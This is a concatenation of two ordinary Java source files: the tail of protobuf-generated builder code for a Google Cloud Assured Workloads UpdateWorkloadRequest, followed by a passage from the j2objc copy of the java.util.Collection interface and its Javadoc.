maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if 
(com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) { getWorkloadFieldBuilder(); getUpdateMaskFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; workload_ = null; if (workloadBuilder_ != null) { workloadBuilder_.dispose(); workloadBuilder_ = null; } updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.assuredworkloads.v1beta1.AssuredworkloadsProto .internal_static_google_cloud_assuredworkloads_v1beta1_UpdateWorkloadRequest_descriptor; } @java.lang.Override public com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest getDefaultInstanceForType() { return com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest.getDefaultInstance(); } @java.lang.Override public com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest build() { com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest buildPartial() { com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest result = new com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0( com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest result) { int from_bitField0_ = bitField0_; int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000001) != 0)) { result.workload_ = workloadBuilder_ == null ? workload_ : workloadBuilder_.build(); to_bitField0_ |= 0x00000001; } if (((from_bitField0_ & 0x00000002) != 0)) { result.updateMask_ = updateMaskBuilder_ == null ? 
updateMask_ : updateMaskBuilder_.build(); to_bitField0_ |= 0x00000002; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest) { return mergeFrom((com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom( com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest other) { if (other == com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest.getDefaultInstance()) return this; if (other.hasWorkload()) { mergeWorkload(other.getWorkload()); } if (other.hasUpdateMask()) { mergeUpdateMask(other.getUpdateMask()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if 
(extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage(getWorkloadFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000001; break; } // case 10 case 18: { input.readMessage(getUpdateMaskFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000002; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private com.google.cloud.assuredworkloads.v1beta1.Workload workload_; private com.google.protobuf.SingleFieldBuilderV3< com.google.cloud.assuredworkloads.v1beta1.Workload, com.google.cloud.assuredworkloads.v1beta1.Workload.Builder, com.google.cloud.assuredworkloads.v1beta1.WorkloadOrBuilder> workloadBuilder_; /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. * Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the workload field is set. */ public boolean hasWorkload() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. * Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The workload. 
*/ public com.google.cloud.assuredworkloads.v1beta1.Workload getWorkload() { if (workloadBuilder_ == null) { return workload_ == null ? com.google.cloud.assuredworkloads.v1beta1.Workload.getDefaultInstance() : workload_; } else { return workloadBuilder_.getMessage(); } } /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. * Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setWorkload(com.google.cloud.assuredworkloads.v1beta1.Workload value) { if (workloadBuilder_ == null) { if (value == null) { throw new NullPointerException(); } workload_ = value; } else { workloadBuilder_.setMessage(value); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. * Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setWorkload( com.google.cloud.assuredworkloads.v1beta1.Workload.Builder builderForValue) { if (workloadBuilder_ == null) { workload_ = builderForValue.build(); } else { workloadBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. 
* Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder mergeWorkload(com.google.cloud.assuredworkloads.v1beta1.Workload value) { if (workloadBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0) && workload_ != null && workload_ != com.google.cloud.assuredworkloads.v1beta1.Workload.getDefaultInstance()) { getWorkloadBuilder().mergeFrom(value); } else { workload_ = value; } } else { workloadBuilder_.mergeFrom(value); } if (workload_ != null) { bitField0_ |= 0x00000001; onChanged(); } return this; } /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. * Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder clearWorkload() { bitField0_ = (bitField0_ & ~0x00000001); workload_ = null; if (workloadBuilder_ != null) { workloadBuilder_.dispose(); workloadBuilder_ = null; } onChanged(); return this; } /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. * Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.cloud.assuredworkloads.v1beta1.Workload.Builder getWorkloadBuilder() { bitField0_ |= 0x00000001; onChanged(); return getWorkloadFieldBuilder().getBuilder(); } /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. 
* Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.cloud.assuredworkloads.v1beta1.WorkloadOrBuilder getWorkloadOrBuilder() { if (workloadBuilder_ != null) { return workloadBuilder_.getMessageOrBuilder(); } else { return workload_ == null ? com.google.cloud.assuredworkloads.v1beta1.Workload.getDefaultInstance() : workload_; } } /** * * * <pre> * Required. The workload to update. * The workload's `name` field is used to identify the workload to be updated. * Format: * organizations/{org_id}/locations/{location_id}/workloads/{workload_id} * </pre> * * <code> * .google.cloud.assuredworkloads.v1beta1.Workload workload = 1 [(.google.api.field_behavior) = REQUIRED]; * </code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.cloud.assuredworkloads.v1beta1.Workload, com.google.cloud.assuredworkloads.v1beta1.Workload.Builder, com.google.cloud.assuredworkloads.v1beta1.WorkloadOrBuilder> getWorkloadFieldBuilder() { if (workloadBuilder_ == null) { workloadBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.cloud.assuredworkloads.v1beta1.Workload, com.google.cloud.assuredworkloads.v1beta1.Workload.Builder, com.google.cloud.assuredworkloads.v1beta1.WorkloadOrBuilder>( getWorkload(), getParentForChildren(), isClean()); workload_ = null; } return workloadBuilder_; } private com.google.protobuf.FieldMask updateMask_; private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> updateMaskBuilder_; /** * * * <pre> * Required. The list of fields to be updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the updateMask field is set. 
*/ public boolean hasUpdateMask() { return ((bitField0_ & 0x00000002) != 0); } /** * * * <pre> * Required. The list of fields to be updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The updateMask. */ public com.google.protobuf.FieldMask getUpdateMask() { if (updateMaskBuilder_ == null) { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } else { return updateMaskBuilder_.getMessage(); } } /** * * * <pre> * Required. The list of fields to be updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (value == null) { throw new NullPointerException(); } updateMask_ = value; } else { updateMaskBuilder_.setMessage(value); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. The list of fields to be updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask.Builder builderForValue) { if (updateMaskBuilder_ == null) { updateMask_ = builderForValue.build(); } else { updateMaskBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. The list of fields to be updated. 
* </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder mergeUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (((bitField0_ & 0x00000002) != 0) && updateMask_ != null && updateMask_ != com.google.protobuf.FieldMask.getDefaultInstance()) { getUpdateMaskBuilder().mergeFrom(value); } else { updateMask_ = value; } } else { updateMaskBuilder_.mergeFrom(value); } if (updateMask_ != null) { bitField0_ |= 0x00000002; onChanged(); } return this; } /** * * * <pre> * Required. The list of fields to be updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder clearUpdateMask() { bitField0_ = (bitField0_ & ~0x00000002); updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } onChanged(); return this; } /** * * * <pre> * Required. The list of fields to be updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.protobuf.FieldMask.Builder getUpdateMaskBuilder() { bitField0_ |= 0x00000002; onChanged(); return getUpdateMaskFieldBuilder().getBuilder(); } /** * * * <pre> * Required. The list of fields to be updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { if (updateMaskBuilder_ != null) { return updateMaskBuilder_.getMessageOrBuilder(); } else { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } } /** * * * <pre> * Required. The list of fields to be updated. 
* </pre> * * <code>.google.protobuf.FieldMask update_mask = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> getUpdateMaskFieldBuilder() { if (updateMaskBuilder_ == null) { updateMaskBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder>( getUpdateMask(), getParentForChildren(), isClean()); updateMask_ = null; } return updateMaskBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest) } // @@protoc_insertion_point(class_scope:google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest) private static final com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest(); } public static com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<UpdateWorkloadRequest> PARSER = new com.google.protobuf.AbstractParser<UpdateWorkloadRequest>() { @java.lang.Override public UpdateWorkloadRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch 
(com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<UpdateWorkloadRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<UpdateWorkloadRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.assuredworkloads.v1beta1.UpdateWorkloadRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
google/j2objc
36,203
jre_emul/android/platform/libcore/ojluni/src/main/java/java/util/Collection.java
/* * Copyright (c) 1997, 2018, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the LICENSE file that accompanied this code. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. */ package java.util; import java.util.function.IntFunction; import java.util.function.Predicate; import java.util.stream.Stream; import java.util.stream.StreamSupport; /** * The root interface in the <i>collection hierarchy</i>. A collection * represents a group of objects, known as its <i>elements</i>. Some * collections allow duplicate elements and others do not. Some are ordered * and others unordered. The JDK does not provide any <i>direct</i> * implementations of this interface: it provides implementations of more * specific subinterfaces like {@code Set} and {@code List}. This interface * is typically used to pass collections around and manipulate them where * maximum generality is desired. 
* * <p><i>Bags</i> or <i>multisets</i> (unordered collections that may contain * duplicate elements) should implement this interface directly. * * <p>All general-purpose {@code Collection} implementation classes (which * typically implement {@code Collection} indirectly through one of its * subinterfaces) should provide two "standard" constructors: a void (no * arguments) constructor, which creates an empty collection, and a * constructor with a single argument of type {@code Collection}, which * creates a new collection with the same elements as its argument. In * effect, the latter constructor allows the user to copy any collection, * producing an equivalent collection of the desired implementation type. * There is no way to enforce this convention (as interfaces cannot contain * constructors) but all of the general-purpose {@code Collection} * implementations in the Java platform libraries comply. * * <p>Certain methods are specified to be * <i>optional</i>. If a collection implementation doesn't implement a * particular operation, it should define the corresponding method to throw * {@code UnsupportedOperationException}. Such methods are marked "optional * operation" in method specifications of the collections interfaces. * * <p><a id="optional-restrictions"></a>Some collection implementations * have restrictions on the elements that they may contain. * For example, some implementations prohibit null elements, * and some have restrictions on the types of their elements. Attempting to * add an ineligible element throws an unchecked exception, typically * {@code NullPointerException} or {@code ClassCastException}. Attempting * to query the presence of an ineligible element may throw an exception, * or it may simply return false; some implementations will exhibit the former * behavior and some will exhibit the latter. 
More generally, attempting an * operation on an ineligible element whose completion would not result in * the insertion of an ineligible element into the collection may throw an * exception or it may succeed, at the option of the implementation. * Such exceptions are marked as "optional" in the specification for this * interface. * * <p>It is up to each collection to determine its own synchronization * policy. In the absence of a stronger guarantee by the * implementation, undefined behavior may result from the invocation * of any method on a collection that is being mutated by another * thread; this includes direct invocations, passing the collection to * a method that might perform invocations, and using an existing * iterator to examine the collection. * * <p>Many methods in Collections Framework interfaces are defined in * terms of the {@link Object#equals(Object) equals} method. For example, * the specification for the {@link #contains(Object) contains(Object o)} * method says: "returns {@code true} if and only if this collection * contains at least one element {@code e} such that * {@code (o==null ? e==null : o.equals(e))}." This specification should * <i>not</i> be construed to imply that invoking {@code Collection.contains} * with a non-null argument {@code o} will cause {@code o.equals(e)} to be * invoked for any element {@code e}. Implementations are free to implement * optimizations whereby the {@code equals} invocation is avoided, for * example, by first comparing the hash codes of the two elements. (The * {@link Object#hashCode()} specification guarantees that two objects with * unequal hash codes cannot be equal.) More generally, implementations of * the various Collections Framework interfaces are free to take advantage of * the specified behavior of underlying {@link Object} methods wherever the * implementor deems it appropriate. 
* * <p>Some collection operations which perform recursive traversal of the * collection may fail with an exception for self-referential instances where * the collection directly or indirectly contains itself. This includes the * {@code clone()}, {@code equals()}, {@code hashCode()} and {@code toString()} * methods. Implementations may optionally handle the self-referential scenario, * however most current implementations do not do so. * * <h2><a id="view">View Collections</a></h2> * * <p>Most collections manage storage for elements they contain. By contrast, <i>view * collections</i> themselves do not store elements, but instead they rely on a * backing collection to store the actual elements. Operations that are not handled * by the view collection itself are delegated to the backing collection. Examples of * view collections include the wrapper collections returned by methods such as * {@link Collections#checkedCollection Collections.checkedCollection}, * {@link Collections#synchronizedCollection Collections.synchronizedCollection}, and * {@link Collections#unmodifiableCollection Collections.unmodifiableCollection}. * Other examples of view collections include collections that provide a * different representation of the same elements, for example, as * provided by {@link List#subList List.subList}, * {@link NavigableSet#subSet NavigableSet.subSet}, or * {@link Map#entrySet Map.entrySet}. * Any changes made to the backing collection are visible in the view collection. * Correspondingly, any changes made to the view collection &mdash; if changes * are permitted &mdash; are written through to the backing collection. * Although they technically aren't collections, instances of * {@link Iterator} and {@link ListIterator} can also allow modifications * to be written through to the backing collection, and in some cases, * modifications to the backing collection will be visible to the Iterator * during iteration. 
* * <h2><a id="unmodifiable">Unmodifiable Collections</a></h2> * * <p>Certain methods of this interface are considered "destructive" and are called * "mutator" methods in that they modify the group of objects contained within * the collection on which they operate. They can be specified to throw * {@code UnsupportedOperationException} if this collection implementation * does not support the operation. Such methods should (but are not required * to) throw an {@code UnsupportedOperationException} if the invocation would * have no effect on the collection. For example, consider a collection that * does not support the {@link #add add} operation. What will happen if the * {@link #addAll addAll} method is invoked on this collection, with an empty * collection as the argument? The addition of zero elements has no effect, * so it is permissible for this collection simply to do nothing and not to throw * an exception. However, it is recommended that such cases throw an exception * unconditionally, as throwing only in certain cases can lead to * programming errors. * * <p>An <i>unmodifiable collection</i> is a collection, all of whose * mutator methods (as defined above) are specified to throw * {@code UnsupportedOperationException}. Such a collection thus cannot be * modified by calling any methods on it. For a collection to be properly * unmodifiable, any view collections derived from it must also be unmodifiable. * For example, if a List is unmodifiable, the List returned by * {@link List#subList List.subList} is also unmodifiable. * * <p>An unmodifiable collection is not necessarily immutable. If the * contained elements are mutable, the entire collection is clearly * mutable, even though it might be unmodifiable. For example, consider * two unmodifiable lists containing mutable elements. The result of calling * {@code list1.equals(list2)} might differ from one call to the next if * the elements had been mutated, even though both lists are unmodifiable. 
* However, if an unmodifiable collection contains all immutable elements, * it can be considered effectively immutable. * * <h2><a id="unmodview">Unmodifiable View Collections</a></h2> * * <p>An <i>unmodifiable view collection</i> is a collection that is unmodifiable * and that is also a view onto a backing collection. Its mutator methods throw * {@code UnsupportedOperationException}, as described above, while * reading and querying methods are delegated to the backing collection. * The effect is to provide read-only access to the backing collection. * This is useful for a component to provide users with read access to * an internal collection, while preventing them from modifying such * collections unexpectedly. Examples of unmodifiable view collections * are those returned by the * {@link Collections#unmodifiableCollection Collections.unmodifiableCollection}, * {@link Collections#unmodifiableList Collections.unmodifiableList}, and * related methods. * * <p>Note that changes to the backing collection might still be possible, * and if they occur, they are visible through the unmodifiable view. Thus, * an unmodifiable view collection is not necessarily immutable. However, * if the backing collection of an unmodifiable view is effectively immutable, * or if the only reference to the backing collection is through an * unmodifiable view, the view can be considered effectively immutable. * * <p>This interface is a member of the * <a href="{@docRoot}/../technotes/guides/collections/index.html"> * Java Collections Framework</a>. * * @implSpec * The default method implementations (inherited or otherwise) do not apply any * synchronization protocol. If a {@code Collection} implementation has a * specific synchronization protocol, then it must override default * implementations to apply that protocol. 
* * @param <E> the type of elements in this collection * * @author Josh Bloch * @author Neal Gafter * @see Set * @see List * @see Map * @see SortedSet * @see SortedMap * @see HashSet * @see TreeSet * @see ArrayList * @see LinkedList * @see Vector * @see Collections * @see Arrays * @see AbstractCollection * @since 1.2 */ public interface Collection<E> extends Iterable<E> { // Query Operations /** * Returns the number of elements in this collection. If this collection * contains more than {@code Integer.MAX_VALUE} elements, returns * {@code Integer.MAX_VALUE}. * * @return the number of elements in this collection */ int size(); /** * Returns {@code true} if this collection contains no elements. * * @return {@code true} if this collection contains no elements */ boolean isEmpty(); /** * Returns {@code true} if this collection contains the specified element. * More formally, returns {@code true} if and only if this collection * contains at least one element {@code e} such that * {@code Objects.equals(o, e)}. * * @param o element whose presence in this collection is to be tested * @return {@code true} if this collection contains the specified * element * @throws ClassCastException if the type of the specified element * is incompatible with this collection * (<a href="{@docRoot}/java.base/java/util/Collection.html#optional-restrictions">optional</a>) * @throws NullPointerException if the specified element is null and this * collection does not permit null elements * (<a href="{@docRoot}/java.base/java/util/Collection.html#optional-restrictions">optional</a>) */ boolean contains(Object o); /** * Returns an iterator over the elements in this collection. There are no * guarantees concerning the order in which the elements are returned * (unless this collection is an instance of some class that provides a * guarantee). 
* * @return an {@code Iterator} over the elements in this collection */ Iterator<E> iterator(); /** * Returns an array containing all of the elements in this collection. * If this collection makes any guarantees as to what order its elements * are returned by its iterator, this method must return the elements in * the same order. The returned array's {@linkplain Class#getComponentType * runtime component type} is {@code Object}. * * <p>The returned array will be "safe" in that no references to it are * maintained by this collection. (In other words, this method must * allocate a new array even if this collection is backed by an array). * The caller is thus free to modify the returned array. * * @apiNote * This method acts as a bridge between array-based and collection-based APIs. * It returns an array whose runtime type is {@code Object[]}. * Use {@link #toArray(Object[]) toArray(T[])} to reuse an existing * array, or use {@link #toArray(IntFunction)} to control the runtime type * of the array. * * @return an array, whose {@linkplain Class#getComponentType runtime component * type} is {@code Object}, containing all of the elements in this collection */ Object[] toArray(); /** * Returns an array containing all of the elements in this collection; * the runtime type of the returned array is that of the specified array. * If the collection fits in the specified array, it is returned therein. * Otherwise, a new array is allocated with the runtime type of the * specified array and the size of this collection. * * <p>If this collection fits in the specified array with room to spare * (i.e., the array has more elements than this collection), the element * in the array immediately following the end of the collection is set to * {@code null}. (This is useful in determining the length of this * collection <i>only</i> if the caller knows that this collection does * not contain any {@code null} elements.) 
* * <p>If this collection makes any guarantees as to what order its elements * are returned by its iterator, this method must return the elements in * the same order. * * @apiNote * This method acts as a bridge between array-based and collection-based APIs. * It allows an existing array to be reused under certain circumstances. * Use {@link #toArray()} to create an array whose runtime type is {@code Object[]}, * or use {@link #toArray(IntFunction)} to control the runtime type of * the array. * * <p>Suppose {@code x} is a collection known to contain only strings. * The following code can be used to dump the collection into a previously * allocated {@code String} array: * * <pre> * String[] y = new String[SIZE]; * ... * y = x.toArray(y);</pre> * * <p>The return value is reassigned to the variable {@code y}, because a * new array will be allocated and returned if the collection {@code x} has * too many elements to fit into the existing array {@code y}. * * <p>Note that {@code toArray(new Object[0])} is identical in function to * {@code toArray()}. * * @param <T> the component type of the array to contain the collection * @param a the array into which the elements of this collection are to be * stored, if it is big enough; otherwise, a new array of the same * runtime type is allocated for this purpose. * @return an array containing all of the elements in this collection * @throws ArrayStoreException if the runtime type of any element in this * collection is not assignable to the {@linkplain Class#getComponentType * runtime component type} of the specified array * @throws NullPointerException if the specified array is null */ <T> T[] toArray(T[] a); /** * Returns an array containing all of the elements in this collection, * using the provided {@code generator} function to allocate the returned array. * * <p>If this collection makes any guarantees as to what order its elements * are returned by its iterator, this method must return the elements in * the same order. 
* * @apiNote * This method acts as a bridge between array-based and collection-based APIs. * It allows creation of an array of a particular runtime type. Use * {@link #toArray()} to create an array whose runtime type is {@code Object[]}, * or use {@link #toArray(Object[]) toArray(T[])} to reuse an existing array. * * <p>Suppose {@code x} is a collection known to contain only strings. * The following code can be used to dump the collection into a newly * allocated array of {@code String}: * * <pre> * String[] y = x.toArray(String[]::new);</pre> * * @implSpec * The default implementation calls the generator function with zero * and then passes the resulting array to {@link #toArray(Object[]) toArray(T[])}. * * @param <T> the component type of the array to contain the collection * @param generator a function which produces a new array of the desired * type and the provided length * @return an array containing all of the elements in this collection * @throws ArrayStoreException if the runtime type of any element in this * collection is not assignable to the {@linkplain Class#getComponentType * runtime component type} of the generated array * @throws NullPointerException if the generator function is null * @since 11 */ /* J2ObjC removed default <T> T[] toArray(IntFunction<T[]> generator) { return toArray(generator.apply(0)); } */ // Modification Operations /** * Ensures that this collection contains the specified element (optional * operation). Returns {@code true} if this collection changed as a * result of the call. (Returns {@code false} if this collection does * not permit duplicates and already contains the specified element.)<p> * * Collections that support this operation may place limitations on what * elements may be added to this collection. In particular, some * collections will refuse to add {@code null} elements, and others will * impose restrictions on the type of elements that may be added. 
* Collection classes should clearly specify in their documentation any * restrictions on what elements may be added.<p> * * If a collection refuses to add a particular element for any reason * other than that it already contains the element, it <i>must</i> throw * an exception (rather than returning {@code false}). This preserves * the invariant that a collection always contains the specified element * after this call returns. * * @param e element whose presence in this collection is to be ensured * @return {@code true} if this collection changed as a result of the * call * @throws UnsupportedOperationException if the {@code add} operation * is not supported by this collection * @throws ClassCastException if the class of the specified element * prevents it from being added to this collection * @throws NullPointerException if the specified element is null and this * collection does not permit null elements * @throws IllegalArgumentException if some property of the element * prevents it from being added to this collection * @throws IllegalStateException if the element cannot be added at this * time due to insertion restrictions */ boolean add(E e); /** * Removes a single instance of the specified element from this * collection, if it is present (optional operation). More formally, * removes an element {@code e} such that * {@code Objects.equals(o, e)}, if * this collection contains one or more such elements. Returns * {@code true} if this collection contained the specified element (or * equivalently, if this collection changed as a result of the call). 
 * * @param o element to be removed from this collection, if present * @return {@code true} if an element was removed as a result of this call * @throws ClassCastException if the type of the specified element * is incompatible with this collection * (<a href="#optional-restrictions">optional</a>) * @throws NullPointerException if the specified element is null and this * collection does not permit null elements * (<a href="#optional-restrictions">optional</a>) * @throws UnsupportedOperationException if the {@code remove} operation * is not supported by this collection */ boolean remove(Object o); // Bulk Operations /** * Returns {@code true} if this collection contains all of the elements * in the specified collection. * * @param c collection to be checked for containment in this collection * @return {@code true} if this collection contains all of the elements * in the specified collection * @throws ClassCastException if the types of one or more elements * in the specified collection are incompatible with this * collection * (<a href="#optional-restrictions">optional</a>) * @throws NullPointerException if the specified collection contains one * or more null elements and this collection does not permit null * elements * (<a href="#optional-restrictions">optional</a>), * or if the specified collection is null. * @see #contains(Object) */ boolean containsAll(Collection<?> c); /** * Adds all of the elements in the specified collection to this collection * (optional operation). The behavior of this operation is undefined if * the specified collection is modified while the operation is in progress. * (This implies that the behavior of this call is undefined if the * specified collection is this collection, and this collection is * nonempty.) 
